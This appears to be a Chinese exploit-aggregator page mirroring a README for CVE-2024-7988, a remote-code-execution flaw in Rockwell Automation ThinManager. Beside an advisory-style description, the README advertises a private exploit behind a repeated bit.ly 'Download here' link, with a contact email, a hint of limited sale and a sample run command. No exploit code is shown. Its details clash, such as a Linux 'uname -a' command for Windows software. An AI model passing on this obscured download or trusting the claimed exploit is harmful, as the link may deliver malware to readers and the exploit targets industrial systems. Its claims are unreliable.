关联漏洞
标题:
Rockwell Automation ThinManager 安全漏洞
(CVE-2024-7988)
描述:Rockwell Automation ThinManager是美国罗克韦尔(Rockwell Automation)公司的一款瘦客户端管理软件。允许将瘦客户端同时分配给多个远程桌面服务器。 Rockwell Automation ThinManager存在安全漏洞,该漏洞源于存在远程代码执行漏洞,允许威胁参与者以系统权限执行任意代码。受影响版本如下:11.1.0至11.1.7版本、11.2.0至11.2.8版本、12.0.0至12.0.6版本、12.1.0至12.1.7版本、13.0.0至13.0.4版
描述
Rockwell Automation ThinManager ThinServer Unrestricted File Upload Remote Code Execution Vulnerability
介绍
# CVE-2024-7988: Rockwell Automation ThinManager ThinServer Unrestricted File Upload Remote Code Execution Vulnerability
# Overview:
A remote code execution vulnerability exists in the Rockwell Automation ThinManager® ThinServer™ that allows a threat actor to execute arbitrary code with System privileges. This vulnerability exists due to the lack of proper data input validation, which allows files to be overwritten.
# Exploit
## [**Download here**](https://bit.ly/4fvZzHP)
## Details
+ **CVE ID**: [CVE-2024-7988](https://nvd.nist.gov/vuln/detail/CVE-2024-7988)
+ **Published**: 2024-08-22
+ **Impact**: Confidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation ThinManager. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the ThinServer service. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
## Affected Versions
ThinManager® ThinServer™
+ **11.1.0-11.1.7**
+ **11.2.0-11.2.8**
+ **12.0.0-12.0.6**
+ **12.1.0-12.1.7**
+ **13.0.0-13.0.4**
+ **13.1.0-13.1.2**
+ **13.2.0-13.2.1**
## Running
To run exploit you need Python 3.9. Execute:
```
python CVE-2024-7988.py -h 10.10.10.10 -c 'uname -a'
```
+ ## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/4fvZzHP) (Only 4 hands)

文件快照
[4.0K] /data/pocs/ef0338fb46ce4db84fbc2604f4b57f468f1d7b99
└── [1.7K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。